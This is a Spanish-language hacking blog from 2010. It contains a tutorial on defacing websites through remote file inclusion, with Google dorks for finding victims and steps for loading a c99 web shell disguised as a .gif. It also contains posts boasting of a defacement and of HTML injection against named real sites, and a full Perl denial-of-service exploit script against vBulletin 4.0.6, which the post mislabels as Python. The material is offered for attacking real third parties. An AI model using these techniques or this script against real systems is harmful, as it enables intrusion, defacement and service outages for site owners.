lunes, 22 de noviembre de 2010

Tutorial RFI ( Defacing )


***********
RFI
***********

1- Que es RFI?
2- Que es una SHELL?
3- Como encontrar una web vulnerable?
4- Como explotar la vulnerabilidad?
5- Dejando nuesra marca
6- Como evitar que nos lo hagan a nosotros

***************
Que es RFI?
***************

RFI (Remote File Inclusion) es una vulnerabilidad que solamente existe en paginas dinamicas como php que permite enlazar archivos que estan en servidores remotos, esta vulnerabilidad se produce por una mala programacion del webmaster usando la funcion include()
Una web vulnerable podria ser:
www.victima.com/index.php?page=videos.php
Esta pagina lo que esta haciendo es incluir el documento "videos.php".
Nos aprovecharemos de esto incluyendo nuestros propios archivos pero para eso necesitamos una shell.


*********************
Que es una shell?
*********************

Una shell es un interrete de ordenes y comandos. Es una interfaz para comunicar el usuario con el sistema operativo.
Esto para que nos sirve en nuestro deface pensaras? Pues esta claro! Con esto ejecutaremos comandos en la web victima.

**********************************
Como encontrar una web vulnerable?
**********************************

Como encontrar una web vulnerable? Pues con google!
Podemos encontrarlas haciendo busquedas del tipo:
allinurl:index.php?page= .php
y variantes, en vez de page otra cosa similar como: go, pg, ir, ...

************************************
Como explotar la vulnerabilidad?
************************************

Vamos a ver como explotar la vulnerabilidad, tenemos la web
www.victima.com/index.php?page=videos.php
para comprobar que es vulnerable vamos a poner:
page=http://www.zerooo.es (no olvides el http que es muy importante!)
y quedaria algo como...
www.victima.com/index.php?page=http://www.zerooo.es
si ves que nuestra bonita web se carga dentro de esa web, enhorabuena! aunque no siempre esta asegurado el deface...
ahora vamos a meter nuestra shell ahi, hay muchos tipos de shell, yo recomiendo la c99 ya que es muy facil de usar, asi que la descargamos de esta misma web
y si no esta en .gif la ponemos como .gif ya que si estuviera .php se ejecutaria en nuestro servidor.
Ahora la subimos a un hosting gratuito mismo como iespana por ejemplo y vamos a nuestra victima y escribimos donde estaba zerooo la direccion de la shell por ejemplo:
www.victima.com/index.php?page=http://tuweb.com/c99.gif? (Ojo con el ? que a veces es importante)
ahora si todo a salido bien deberia abrirse la shell y ahi veriamos lo que podemos hacer, yo recomiendo NO BORRAR NADA pro bueno yo no voy a decir lo que debeis o no debeis hacer

*************************
deben bajarse una web shell, para poder realizar este ataque, busquen la c99 saludos!

martes, 16 de noviembre de 2010

html inyección a www.govisitcostarica.com

analizando un día la web, encontré en varias peticiones la ejecución de html, como se muestra en las siguientes capturas :D xD!







domingo, 14 de noviembre de 2010

Fedora (Linux)



Exactamente, ¿qué es Fedora?

Fedora es un sistema operativo basado en Linux, un conjunto de software que hace funcionar a su computadora. Usted puede utilizar el sistema operativo Fedora para remplazar otros sistemas operativos, o utilizarlo en conjunto con éstos, por ejemplo mantener Microsoft Windows (TM) o Mac OS X (TM) en una partición diferente. El sistema operativo Fedora es gratuito tanto para disfrutarlo como para compartirlo.
web
http://fedoraproject.org/es/

BackTrack 4



BackTrack
 es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a laseguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor +WHAXWHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.1
Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits,sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 32 de la famosa lista "Top 100 Network Security Tools" de 2006.2
es exelente yo lo uso :D
sitio:
www.backtrack-linux.org

WireShark Network Protocol Analyzer



Wireshark
, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo desoftware y protocolos, y como una herramienta didáctica para educación. Cuenta con todas las características estándar de un analizador de protocolos.
La funcionalidad que provee es similar a la de tcpdump, pero añade una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras) estableciendo la configuración en modo promiscuo. También incluye una versión basada en texto llamada tshark.
Permite examinar datos de una red viva o de un archivo de captura salvado en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la habilidad de mostrar el flujo reconstruido de una sesión de TCP.
Wireshark es software libre, y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, incluyendo LinuxSolarisFreeBSDNetBSDOpenBSD, y Mac OS X, así como en Microsoft Windows.
web
www.wireshark.org

Tutorial Metasploit

este tuto me pareció bueno así que acá se los pongo
web:
http://foro.portalhacker.net/index.php/topic,93233.0.html

Web Defacing /www.dgroupsa.com.ar

 Defacing que hice hace poco :)










IP NetInfo ( analizador de direcciones IP )


PNetInfo es una pequeña utilidad que te permite encontrar fácilmente toda la información disponible sobre una dirección IP: El propietario de la dirección IP, el nombre del país / estado, rango de direcciones IP, información de contacto (dirección, teléfono, fax y correo electrónico), y 
más.Esta utilidad puede ser muy útil para encontrar el origen de correo no solicitado. Usted puede simplemente copiar los encabezados de los mensajes de su software de correo electrónico y las pega en la utilidad IPNetInfo. IPNetInfo extrae automáticamente todas las direcciones IP desde las cabeceras del mensaje, y muestra la información acerca de estas direcciones IP.
web:
http://www.nirsoft.net/utils/ipnetinfo.html

SmartSniff Packet Sniffer


SmartSniff es una utilidad de monitorización de red que le permite capturar los paquetes TCP / IP que pasan a través de su adaptador de red, y ver los datos capturados como secuencia de conversaciones entre clientes y servidores. 
Usted puede ver el protocolo TCP / IP conversaciones en modo ASCII (para protocolos basados en texto, como HTTP, SMTP, POP3 y FTP.) O como volcado hexadecimal. (Para los protocolos de base no son de texto, como DNS)SmartSniff ofrece tres métodos para capturar los paquetes TCP / IP
descarga
www.nirsoft.net/utils/smsniff.html 

Brutus AET2


bueno aqui tenemos otro crackeador de claves algo viejito pero que sigue funcionando de lujo soporta menos servicios que el hydra pero igual es bueno. muy facil de usar descarga:
http://www.hoobie.net/

thc-hydra Fuerza Bruta


rápido crackeador de acceso que soportan muchos servicios diferentes, entre los cuales puedo mencionar 
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
          ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable,
          AFP, LDAP2, Cisco AAA (incorporated in telnet module).
descarga para linux..

http://freeworld.thc.org/thc-hydra/

Nmap Network Mapper!

Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.
descarga
www.nmap.org

Metasploit Framework


Metasploit -  

Penetration Testing Resources

Metasploit proporciona información útil y herramientas para pruebas de penetración, los investigadores de seguridad, y los desarrolladores de la firma IDS. Este proyecto fue creado para proporcionar información sobre las técnicas de explotación y crear una base de conocimiento funcional para explotar los desarrolladores y profesionales de la seguridad. Las herramientas y la información en este sitio se proporcionan para la investigación de seguridad jurídica y propósitos de prueba solamente. Metasploit es un proyecto de código abierto gestionados por Rapid7.
lo eh usado y es increíble recomendado!descarga
http://www.metasploit.com/framework/download/ 

DDoS vBulletin 4.0.6

bien este exploit esta hecho en phyton, facil de usar
el codigo es el siguiente:

################################################
Author : KnocKout
Thanks : DaiMon,BARCOD3
Contact : knockoutr@msn.com
Tested on : redhat
##############################################
##################vBulletin 4.0.6 - Danial Of Service Exploit for RedHat###############

#!/usr/bin/perl

use IO::Socket;

print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";
print "+       vBulletin 4.0.6  D.O.S Exploit(FOR redhat)       +\n";
print "+               Coded by KnocKout                +\n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n";
print "Host |without http://www.forodecostarica.com| ";
chomp($host = <STDIN>);
print "Path |example. /en or / | ";
chomp($pth = <STDIN>);
{
while($x != 999999)
{
$postit = "?t=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nOffline! - We can not Connect To '$host' it May be DoSed\n" unless $sock;

print $sock "POST $pth/showthread.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "Attack Started ";
$x++;
}
}
para los que saben phyton, no hace falta que les diga como usarlo!

www.ufidelitas.ac.cr Vulnerables Inyecciones HTML

analizando la web de esta universidad me encontré con la sorpresa de  que es vulnerable a este tipo de ataques en múltiples peticiones, pudiendo inyectar todo el HTML que se desee en estas imágenes podemos ver cuando el navegador ejecuta las scripts perfectamente.





como podemos ver complemente vulnerable..